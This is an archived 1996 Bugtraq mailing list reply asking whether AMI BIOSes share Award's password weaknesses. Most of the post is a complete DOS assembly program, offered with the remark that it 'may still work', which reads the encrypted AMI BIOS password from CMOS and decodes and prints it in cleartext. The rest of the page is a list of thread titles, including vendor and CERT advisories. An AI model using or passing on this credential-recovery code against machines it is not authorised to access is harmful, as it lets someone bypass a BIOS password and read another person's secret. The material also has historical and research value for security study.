Bugtraq mailing list archives
Re: BoS: Magic password of some linux-box(Hardware..)
From: rmoar () apertos0 csc UVic CA (Roger Moar)
Date: Thu, 21 Nov 1996 08:36:25 -0800
Does anyone know if only the Award BIOS is susceptible to this? In other words, are other BIOSes, such as AMI BIOS, susceptible to the same sort of behavior? Brian
I don't really remember where I got the following code, but it worked a few years ago on a 486 machine. If AMI hasn't changed things much, it may still work. -Roger. ---------------------------------------------------------------------- ; AMiPSW.ASM - Decodes and displays the Ami-Bios-Password! ; coded by mEsCaL/ThE SkeWerS ; v1.1 Toad Hall Tweak, 12 Mar 95 ; - Minor optimizing (just can't resist) ; - Adding some comments ; David Kirschbaum, Toad Hall CODE SEGMENT ORG 100h ASSUME CS:CODE,DS:CODE Start PROC NEAR ; <-=-> THiS ONE READS THE ENCRYPTED PASSWORD FROM CMOS <-=-> mov cl,'[' ;Bracket the password v1.1 call CharOut ;display it v1.1 cld ;insure forward v1.1 mov cl,0b7h ;CMOS starting address ;v1.1 lea di,Password mov di,offset Password ; v1.1 push di ;save for later v1.1 Read_Password: mov al,cl ;CMOS address we want out 70h,al jmp $+2 ;delay a tick in al,71h ;Get password char ;v1.1 mov [di],al ;stuff in buffer ;v1.1 inc di ;bump stosb ;stuff in buffer v1.1 inc cl ;bump CMOS address cmp cl,0b7h+7 ;done 7 chars yet? jnz Read_Password ;not yet ; <-=-> NOW, WE HAVE TO DECRYPT CHAR BY CHAR <-=-> ;v1.1 lea di,Password pop di ;restore pointer to password v1.1 and byte ptr [di],0f0h ;mask first char inc di ;point to next char Decrypt_Next: cmp di,Offset Password+7 ;hit end? jnl Completed ;yep cmp byte ptr [di],0 ;current char a 0? jz Completed ;yep, 0 terminated xor cl,cl ;handy 0 mov ch,byte ptr [di-1] ;get previous char Decrypt: inc cl ;build char in CL mov ah,ch ;char to decrypt xor dx,dx test ah,10000000b jz NotSet7 inc dh NotSet7: test ah,01000000b jz NotSet6 inc dh NotSet6: test ah,00000010b jz NotSet2 inc dh NotSet2: test ah,00000001b jz NotSet1 inc dh NotSet1: add dl,2 cmp dl,dh jl NotSet1 ;loop sub dl,dh shr ch,1 cmp dl,1 jnz $+5 add ch,80h cmp ch,byte ptr [di] ;match next char? jnz Decrypt ;nope, continue ; <-=-> AND FiNALLY, WE HAVE TO OUTPUT OUR DECRYPTED CHAR <-=-> mov ah,2 ;display char function mov dl,cl ;this char int 21h inc di ;next char jmp Decrypt_Next ;loop ; <-=-> THAT'S ALL? WELL, THAN LET'S QUiT DiZ SH**! :-) <-=-> Completed: mov cl,']' ;Close the bracket v1.1 call CharOut ;display it v1.1 mov ax,4c00h ;terminate, ERRORLEVEL 0 int 21h Start ENDP ;v1.1 New function: enter with char to display in CL CharOut PROC NEAR ;v1.1 mov ah,2 ;display char function mov dl,cl ;this char int 21h ret CharOut ENDP ;Password DB 6 DUP (?) Password label byte ;dynamic buffer v1.1 CODE ENDS END Start -- Roger Moar -- rmoar () csr uvic ca | http://apertos0.csc.uvic.ca/~rmoar
Current thread:
- Re: BoS: Magic password of some linux-box(Hardware..) Brian F. Knoll (Nov 20)
- Re: BoS: Magic password of some linux-box(Hardware..) Roger Moar (Nov 21)
- BoS: Magic password of some linux-box(Hardware..) (fwd) sameer (Nov 21)
- SGI Security Advisory 19961102 - FLEXlm and LicenseManager SGI Security Coordinator (Nov 21)
- SGI Security Advisory 19961103 - Sendmail Daemon Mode SGI Security Coordinator (Nov 21)
- CERT Advisory CA-96.24 - Sendmail Daemon Mode Vulnerability CERT Advisory (Nov 21)
- L0pht Kerberos Advisory sameer (Nov 22)
- <Possible follow-ups>
- Re: BoS: Magic password of some linux-box(Hardware..) Eugene Bradley (Nov 20)